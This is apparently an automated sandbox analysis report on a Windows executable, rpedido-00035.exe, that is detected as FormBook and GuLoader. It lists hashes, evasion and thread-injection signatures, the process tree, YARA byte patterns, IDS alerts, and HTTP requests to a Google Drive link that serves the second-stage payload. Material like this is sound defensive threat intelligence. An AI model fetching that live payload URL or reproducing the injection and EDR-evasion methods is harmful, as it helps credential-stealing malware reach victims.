
Windows Analysis Report
rpedido-00035.exe

Overview

General Information

Sample name: rpedido-00035.exe
Analysis ID: 1526071
MD5: 13de5fefd3dda5e310cde2fa1e6d4b32
SHA1: 3e54744b089154a3a90ebe930ae8af45879e88a9
SHA256: 7861c46cbb414dbcc6aa51977b94c3532391afa08aaa9907f865e51eb95422b0

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • rpedido-00035.exe (PID: 7832 cmdline: "C:\Users\user\Desktop\rpedido-00035.exe" MD5: 13DE5FEFD3DDA5E310CDE2FA1E6D4B32)
    • rpedido-00035.exe (PID: 1532 cmdline: "C:\Users\user\Desktop\rpedido-00035.exe" MD5: 13DE5FEFD3DDA5E310CDE2FA1E6D4B32)
      • RAVCpl64.exe (PID: 4296 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • sethc.exe (PID: 8116 cmdline: "C:\Windows\SysWOW64\sethc.exe" MD5: AA9A6E4DADA121001CFDF184B9758BBE)
          • explorer.exe (PID: 1648 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\Meningorrhoea.Tig | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
C:\Users\user\AppData\Local\Temp\nszDD94.tmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security

Source | Rule | Description | Author | Strings
00000004.00000002.46413796003.00000000027A0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000004.00000002.46413796003.00000000027A0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2bd00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.44867603044.0000000000150000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.44867603044.0000000000150000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2bd00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.46414254627.00000000042D0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
            No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-04T17:25:15.462505+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49775 | 142.250.65.206 | 443 | TCP

            AV Detection

Source: rpedido-00035.exe | Avira: detected
Source: rpedido-00035.exe | ReversingLabs: Detection: 18%
Source: Yara match | File source: 00000004.00000002.46413796003.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.44867603044.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.46414254627.00000000042D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: rpedido-00035.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 142.250.65.206:443 -> 192.168.11.20:49775 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.65.161:443 -> 192.168.11.20:49776 version: TLS 1.2
Source: rpedido-00035.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: rpedido-00035.exe, 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44785542514.0000000035E38000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44782208695.0000000035C8C000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: rpedido-00035.exe, rpedido-00035.exe, 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44785542514.0000000035E38000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44782208695.0000000035C8C000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, sethc.exe
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 0_2_004066F3 FindFirstFileW,FindClose,0_2_004066F3
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 0_2_00405ABE CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405ABE
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 0_2_00402862 FindFirstFileW,0_2_00402862
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4x nop then mov ebx, 00000004h 4_2_043D04DF
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49775 -> 142.250.65.206:443
Source: global traffic | HTTP traffic detected:
    GET /uc?export=download&id=1SJyUxZ-IRKjDGK8OKILiTp3XunWvZ9IX HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: drive.google.com
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /download?id=1SJyUxZ-IRKjDGK8OKILiTp3XunWvZ9IX&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: drive.google.com
Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
Source: rpedido-00035.exe, 00000002.00000003.44817200675.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523778965.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44557524307.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44783022070.0000000005C37000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44782866812.0000000005C3B000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523532832.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: rpedido-00035.exe, 00000002.00000003.44817200675.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523778965.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44557524307.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44783022070.0000000005C37000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44782866812.0000000005C3B000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523532832.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rpedido-00035.exe, 00000000.00000000.43566865335.000000000040A000.00000008.00000001.01000000.00000003.sdmp, rpedido-00035.exe, 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp, rpedido-00035.exe, 00000002.00000000.44420461178.000000000040A000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: rpedido-00035.exe, 00000002.00000003.44817200675.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523778965.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44557524307.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44783022070.0000000005C37000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44782866812.0000000005C3B000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523532832.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0
Source: rpedido-00035.exe, 00000002.00000001.44421584161.00000000005F2000.00000020.00000001.01000000.00000007.sdmp | String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: rpedido-00035.exe, 00000002.00000001.44421584161.00000000005F2000.00000020.00000001.01000000.00000007.sdmp | String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: rpedido-00035.exe, 00000002.00000003.44523778965.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523532832.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com
Source: rpedido-00035.exe, 00000002.00000003.44817200675.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44557524307.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44783022070.0000000005C37000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44782866812.0000000005C3B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.gom
Source: rpedido-00035.exe, 00000002.00000003.44817366771.0000000005BEB000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000002.44880946396.0000000005BF5000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000002.44880946396.0000000005BEC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/
Source: rpedido-00035.exe, 00000002.00000002.44880946396.0000000005BF5000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000002.44881571873.0000000005F00000.00000004.00001000.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000002.44880863640.0000000005BC8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1SJyUxZ-IRKjDGK8OKILiTp3XunWvZ9IX
Source: rpedido-00035.exe, 00000002.00000002.44880863640.0000000005BC8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1SJyUxZ-IRKjDGK8OKILiTp3XunWvZ9IX1
Source: rpedido-00035.exe, 00000002.00000002.44880863640.0000000005BC8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1SJyUxZ-IRKjDGK8OKILiTp3XunWvZ9IXxe
Source: rpedido-00035.exe, 00000002.00000002.44880946396.0000000005BF5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/x
Source: rpedido-00035.exe, 00000002.00000003.44817200675.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44557524307.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44783022070.0000000005C37000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44782866812.0000000005C3B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/
Source: rpedido-00035.exe, 00000002.00000003.44783272355.0000000005C24000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44817200675.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523778965.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44557524307.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44783022070.0000000005C37000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44782866812.0000000005C3B000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523532832.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000002.44881124399.0000000005C24000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1SJyUxZ-IRKjDGK8OKILiTp3XunWvZ9IX&export=download
Source: rpedido-00035.exe, 00000002.00000003.44817200675.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44557524307.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44783022070.0000000005C37000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44782866812.0000000005C3B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1SJyUxZ-IRKjDGK8OKILiTp3XunWvZ9IX&export=downloadtY
Source: rpedido-00035.exe, 00000002.00000003.44817200675.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523778965.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44557524307.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44783022070.0000000005C37000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44782866812.0000000005C3B000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523532832.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: rpedido-00035.exe, 00000002.00000003.44523778965.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523532832.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com
Source: rpedido-00035.exe, 00000002.00000003.44523778965.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523532832.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com;report-uri
Source: rpedido-00035.exe, 00000002.00000003.44523778965.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523532832.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: rpedido-00035.exe, 00000002.00000003.44523778965.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523532832.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com
Source: rpedido-00035.exe, 00000002.00000003.44523778965.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523532832.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown | Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49776 -> 443
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 0_2_00405553 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405553

            E-Banking Fraud

Source: Yara match | File source: 00000004.00000002.46413796003.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.44867603044.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.46414254627.00000000042D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            System Summary

Source: 00000004.00000002.46413796003.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.44867603044.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.46414254627.00000000042D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360534E0 NtCreateMutant,LdrInitializeThunk,2_2_360534E0
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36052EB0 NtProtectVirtualMemory,LdrInitializeThunk,2_2_36052EB0
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36052B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_36052B90
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36052BC0 NtQueryInformationToken,LdrInitializeThunk,2_2_36052BC0
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36054570 NtSuspendThread,2_2_36054570
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36054260 NtSetContextThread,2_2_36054260
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36052E00 NtQueueApcThread,2_2_36052E00
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36052E50 NtCreateSection,2_2_36052E50
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36052E80 NtCreateProcessEx,2_2_36052E80
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36052EC0 NtQuerySection,2_2_36052EC0
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36052ED0 NtResumeThread,2_2_36052ED0
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36052F00 NtCreateFile,2_2_36052F00
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36052F30 NtOpenDirectoryObject,2_2_36052F30
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36052FB0 NtSetValueKey,2_2_36052FB0
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36052C10 NtOpenProcess,2_2_36052C10
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36052C20 NtSetInformationFile,2_2_36052C20
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36052C30 NtMapViewOfSection,2_2_36052C30
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36053C30 NtOpenProcessToken,2_2_36053C30
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36052C50 NtUnmapViewOfSection,2_2_36052C50
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36053C90 NtOpenThread,2_2_36053C90
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36052CD0 NtEnumerateKey,2_2_36052CD0
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36052CF0 NtDelayExecution,2_2_36052CF0
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36052D10 NtQuerySystemInformation,2_2_36052D10
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36052D50 NtWriteVirtualMemory,2_2_36052D50
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36052DA0 NtReadVirtualMemory,2_2_36052DA0
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36052DC0 NtAdjustPrivilegesToken,2_2_36052DC0
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36052A10 NtWriteFile,2_2_36052A10
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36052A80 NtClose,2_2_36052A80
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36052AA0 NtQueryInformationFile,2_2_36052AA0
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36052AC0 NtEnumerateValueKey,2_2_36052AC0
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36052B00 NtQueryValueKey,2_2_36052B00
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36052B10 NtAllocateVirtualMemory,2_2_36052B10
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36052B20 NtQueryInformationProcess,2_2_36052B20
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_045034E0 NtCreateMutant,LdrInitializeThunk,4_2_045034E0
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04502C30 NtMapViewOfSection,LdrInitializeThunk,4_2_04502C30
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04502CF0 NtDelayExecution,LdrInitializeThunk,4_2_04502CF0
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04502D10 NtQuerySystemInformation,LdrInitializeThunk,4_2_04502D10
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04502E50 NtCreateSection,LdrInitializeThunk,4_2_04502E50
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04502F00 NtCreateFile,LdrInitializeThunk,4_2_04502F00
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_045029F0 NtReadFile,LdrInitializeThunk,4_2_045029F0
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04502A80 NtClose,LdrInitializeThunk,4_2_04502A80
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04502B10 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_04502B10
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04502B00 NtQueryValueKey,LdrInitializeThunk,4_2_04502B00
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04502BC0 NtQueryInformationToken,LdrInitializeThunk,4_2_04502BC0
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04502B90 NtFreeVirtualMemory,LdrInitializeThunk,4_2_04502B90
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04502B80 NtCreateKey,LdrInitializeThunk,4_2_04502B80
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04504570 NtSuspendThread,4_2_04504570
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04504260 NtSetContextThread,4_2_04504260
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04502C50 NtUnmapViewOfSection,4_2_04502C50
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04502C10 NtOpenProcess,4_2_04502C10
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04503C30 NtOpenProcessToken,4_2_04503C30
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04502C20 NtSetInformationFile,4_2_04502C20
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04502CD0 NtEnumerateKey,4_2_04502CD0
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04503C90 NtOpenThread,4_2_04503C90
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04502D50 NtWriteVirtualMemory,4_2_04502D50
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04502DC0 NtAdjustPrivilegesToken,4_2_04502DC0
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04502DA0 NtReadVirtualMemory,4_2_04502DA0
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04502E00 NtQueueApcThread,4_2_04502E00
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04502ED0 NtResumeThread,4_2_04502ED0
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04502EC0 NtQuerySection,4_2_04502EC0
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04502E80 NtCreateProcessEx,4_2_04502E80
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04502EB0 NtProtectVirtualMemory,4_2_04502EB0
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04502F30 NtOpenDirectoryObject,4_2_04502F30
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04502FB0 NtSetValueKey,4_2_04502FB0
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_045038D0 NtGetContextThread,4_2_045038D0
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_045029D0 NtWaitForSingleObject,4_2_045029D0
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04502A10 NtWriteFile,4_2_04502A10
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04502AC0 NtEnumerateValueKey,4_2_04502AC0
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04502AA0 NtQueryInformationFile,4_2_04502AA0
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04502B20 NtQueryInformationProcess,4_2_04502B20
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04502BE0 NtQueryVirtualMemory,4_2_04502BE0
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_043DF01D NtQueryInformationProcess,4_2_043DF01D
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_043E3C88 NtResumeThread,4_2_043E3C88
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_043E3648 NtSetContextThread,4_2_043E3648
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_043E4698 NtMapViewOfSection,4_2_043E4698
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_043E3FA8 NtQueueApcThread,4_2_043E3FA8
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_043DF033 NtQueryInformationProcess,4_2_043DF033
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_043DF028 NtQueryInformationProcess,4_2_043DF028
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_043E3968 NtSuspendThread,4_2_043E3968
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_043E4A66 NtUnmapViewOfSection,4_2_043E4A66
Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 0_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403489
